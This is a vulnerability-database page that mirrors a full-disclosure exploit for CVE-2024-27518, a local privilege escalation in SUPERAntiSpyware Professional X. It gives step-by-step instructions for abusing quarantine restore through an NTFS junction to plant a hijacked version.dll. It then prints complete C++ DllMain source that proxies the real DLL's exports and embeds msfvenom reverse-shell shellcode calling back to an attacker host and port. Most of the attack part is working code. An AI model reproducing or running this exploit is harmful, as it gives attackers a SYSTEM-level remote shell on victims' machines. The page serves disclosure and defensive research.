Vulners
Lucene search
SUPERAntiSpyware Professional X 10.0.1264 DLL Hijacking / Privilege Escalation
🗓️ 03 Apr 2024 00:00:00Reported by M. Akil GundoganType 
packetstorm🔗 packetstormsecurity.com👁 302 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | SUPERAntiSyware Professional X 安全漏洞 | 29 Apr 202400:00 | – | cnnvd |
 | CVE-2024-27518 | 29 Apr 202400:00 | – | cve |
 | CVE-2024-27518 | 29 Apr 202400:00 | – | cvelist |
 | Exploit for CVE-2024-27518 | 3 Apr 202413:41 | – | githubexploit |
 | CVE-2024-27518 | 29 Apr 202421:15 | – | nvd |
 | PT-2024-21928 · Unknown · Superantispyware Professional | 29 Apr 202400:00 | – | ptsecurity |
 | CVE-2024-27518 | 23 May 202508:10 | – | redhatcve |
 | CVE-2024-27518 | 29 Apr 202400:00 | – | vulnrichment |
`# Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation
# Date: 03.04.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://superantispyware.com/
# Version: 10.0.1262 and lastest version 10.0.1264
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/FM5XlZPdvdo
# CVE ID: CVE-2024-27518
# Vulnerability Description:
--------------------------------------
SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the "C:\Program Files\SUPERAntiSpyware" folder via an NTFS directory junction, as demonstrated by a crafted version.dll file that is detected as malware. Since SASCore64.exe has a DLL Hijacking vulnerability for "version.dll", a shell is obtained as NT AUTHORITY\SYSTEM after system reboot.
Technical details and step by step Proof of Concept's (PoC):
1 - A malicious version.dll file containing shellcode is created.
2 - If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware, it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll" to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.
3 - Create a new folder and copy the prepared "version.dll" into it. Then the folder is scanned and SUPERAntiSpyware quarantines the DLL.
4 - Using "CreateMountPoint.exe" among the "Symbolic Link Testing" tools provided by Google, the path where "version.dll" is quarantined is mounted in the "C:\Program Files\SUPERAntiSpyware" directory. These tools are available at the following link (https://github.com/googleprojectzero/symboliclink-testing-tools) or you can use the mklink command to do the same thing.
5 - When the quarantined "version.dll" is restored, it will be copied to SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe will execute the shellcode in "version.dll" and open a session with NT AUTHORITY\SYSTEM privileges for the attacker.
# Mitigations:
--------------------------------------
We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed.
# Timeline:
--------------------------------------
- 18.02.2024 - Vulnerability reported via email but vendor refused to fix it.
- 03.04.2024 - Full disclosure.
# References
--------------------------------------
- Vendor: https://www.superantispyware.com/
- CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518
- Repository: https://github.com/secunnix/CVE-2024-27518/
# DLLMain:
-------------------------------------------------------------------------------------------------------------------------
/* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp
M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team
Special Thanks: Safa Karakus and Samet Gozet
If the generated shellcode containing "version.dll" is not already detected by SUPERAntiSpyware,
it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll"
to be detected as malicious. In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.
Compile as release x64 DLL.
*/
#include "windows.h"
#include "ios"
#include "fstream"
#include <iostream>
#pragma once
#pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1")
#pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2")
#pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3")
#pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4")
#pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5")
#pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8")
#pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9")
#pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10")
#pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11")
#pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12")
#pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13")
#pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14")
#pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15")
#pragma comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16")
#pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17")
// Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"
"\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d"
"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"
"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"
"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"
"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"
"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"
"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"
"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"
"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"
"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"
"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"
"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"
"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
VOID shellcodeExecute() {
ShowWindow(GetConsoleWindow(), SW_HIDE);
HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);
void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode));
std::memcpy(mem_map, shellcode, sizeof(shellcode));
std::cout << ((int(*)())mem_map)() << std::endl;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
shellcodeExecute();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2024 00:00Current
7.2High risk
Vulners AI Score7.2
EPSS0.03104